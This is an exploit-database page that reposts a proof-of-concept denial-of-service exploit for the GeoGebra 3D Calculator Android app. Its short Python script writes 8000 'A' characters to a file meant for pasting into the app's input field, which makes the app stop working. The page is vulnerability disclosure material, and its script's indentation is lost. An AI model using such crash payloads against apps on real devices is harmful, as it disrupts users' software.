Geogebra 3d calculator 5.0.511.0 denial of service (poc) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-03-16 | Type : local | Platform : android
This exploit / vulnerability Geogebra 3d calculator 5.0.511.0 denial of service (poc) is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)
# Date: 2021-03-15
# Author: Brian Rodríguez
# Software Site: https://www.geogebra.org/download
# Download Link: https://play.google.com/store/apps/details?id=org.geogebra.android.g3d&utm_source=Download+page&utm_medium=Website&utm_campaign=3D+Calculator+for+Android
# Version: 5.0.511.0
# Category: DoS (Android)

##### Vulnerability #####

Graficador GeoGebra 3D is vulnerable to a DoS condition when a long list of characters is being used in field "Entrada..." text box.

Successful exploitation will causes application stop working.

I have been able to test this exploit against Android 10.0.

##### PoC #####

#!/usr/bin/env python
buffer = "\x41" * 8000

try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")